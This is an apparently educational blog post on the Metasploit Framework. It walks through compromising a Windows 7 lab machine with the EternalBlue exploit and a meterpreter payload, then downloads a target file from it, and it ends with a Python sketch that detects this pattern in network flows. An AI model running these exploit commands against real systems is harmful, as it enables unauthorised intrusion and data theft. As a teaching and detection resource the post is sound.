HealthyByte: Bridge That Gap

What is the Metasploit Framework and how is it used?

The Metasploit Framework is a potent tool that both cybercriminals and ethical hackers can use to probe systematic vulnerabilities on networks, systems, and servers. It is an open-source framework that is easily customizable and can be used with most operating systems. The Metasploit Framework has been licensed by Rapid7 since 2009 and has become the go-to framework for exploit development and mitigation tactics. The software is popular with hackers and widely available, which reinforces the need for security professionals to become familiar with the framework even if they don’t use it.

Metasploit now includes more than 2,000 exploits organized over 25 platforms, including Android, PHP, Python, Java, Cisco, and more. The framework also carries more than 500 payloads, some of which include:

  • Command shell payloads that enable users to run scripts or arbitrary commands against a host.

  • Dynamic payloads that allow testers to generate unique payloads to evade antivirus software.

  • Meterpreter payloads that allow users to commandeer device monitors using VNC and to take over sessions or upload and download files.

  • Static payloads that enable port forwarding and communications between networks.


An example of working with the Metasploit Framework:

Exploiting a Windows 7 machine using Metasploit.

Strategy: Compromise a Windows 7 machine in order to locate and exfiltrate the ‘target.docx’ file.

Tactics:

  1. Perform a network scan.

  2. Analyze the scan output in order to identify the Windows 7 machine.

  3. Gain access to the machine using the ‘EternalBlue’ exploit.

  4. Locate the target file on the machine.

  5. Exfiltrate the file.

Operationally:

  • Run nmap in order to identify Windows 7.

    sudo nmap 192.168.42.2-110

  • Identified the active IP addresses.

    192.168.42.34
    Host is up (0.031s latency).
    Linux unconfirmed
    Web server unconfirmed

    192.168.42.42
    Windows 7 Professional confirmed
    Workstation unconfirmed

    192.168.42.49
    Host is up (0.036s latency).
    All 1000 scanned ports on 192.168.42.49 are filtered
    Linux unconfirmed
    Workstation unconfirmed

    192.168.42.59
    Linux unconfirmed
    Workstation unconfirmed

    192.168.42.63
    Windows Server 2008R2 Standard SP1 confirmed
    Unconfigured unconfirmed

    192.168.42.100
    Windows server 2016 confirmed
    AD Server unconfirmed

  • Gain access using the EternalBlue exploit.

    msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.42.42
    RHOST => 192.168.42.42
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
    payload => windows/x64/meterpreter/bind_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

    meterpreter exploit windows/smb/ms17_010_eternalblue against RHOST 192.168.42.42 with payload windows/x64/meterpreter/bind_tcp
    exploitation was successful & access was gained.

  • Locate the target file on the machine.

    meterpreter > search -f target.docx

  • Exfiltrate the file.

    meterpreter > download C:\\Users\\User\\Desktop\\target.docx

The file was downloaded successfully.
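
On the network, the walkthrough above shows up as an SMB connection to port 445 on 192.168.42.42, followed shortly by a second connection from the same source to the port where the bind_tcp payload listens. The following detection sketch is an added example, not part of the original post; the flow-log format, the source addresses, the ports, the timestamps, the byte counts, the expected-port list and the 60-second window are all assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed flow records (not from the original post):
# timestamp, source IP, destination IP, destination port, bytes sent by destination
SAMPLE_FLOWS = """\
2024-05-01T10:00:02 192.168.42.10 192.168.42.42 445 1200
2024-05-01T10:00:09 192.168.42.10 192.168.42.42 4444 48211
2024-05-01T10:03:30 192.168.42.77 192.168.42.42 445 900
2024-05-01T10:03:40 192.168.42.77 192.168.42.42 3389 15000
2024-05-01T11:00:00 192.168.42.10 192.168.42.63 445 700
2024-05-01T11:30:00 192.168.42.10 192.168.42.63 4444 100
"""

# Assumption: inbound services this site expects on its Windows hosts.
EXPECTED_PORTS = {135, 139, 445, 3389}
WINDOW = timedelta(seconds=60)  # assumption: tune to your environment


def parse_flows(text):
    """Yield (time, src, dst, dst_port, bytes_out) tuples from the sample format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, nbytes = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(port), int(nbytes)


def smb_then_unexpected_port(text, window=WINDOW, expected=EXPECTED_PORTS):
    """Flag a connection to an unexpected port that follows an SMB (445)
    connection between the same source and destination within `window`."""
    last_smb = {}  # (src, dst) -> time of the most recent SMB connection
    alerts = []
    for ts, src, dst, port, nbytes in sorted(parse_flows(text)):
        if port == 445:
            last_smb[(src, dst)] = ts
        elif port not in expected:
            smb_ts = last_smb.get((src, dst))
            if smb_ts is not None and ts - smb_ts <= window:
                alerts.append({"src": src, "dst": dst, "port": port,
                               "seconds_after_smb": (ts - smb_ts).total_seconds(),
                               "bytes_out": nbytes})
    return alerts


if __name__ == "__main__":
    for alert in smb_then_unexpected_port(SAMPLE_FLOWS):
        print(alert)
```

The rule keys on the sequence rather than on a particular port number, since a bind payload can listen on any port. A large `bytes_out` value on the flagged connection is a cue to check for file transfer off the host.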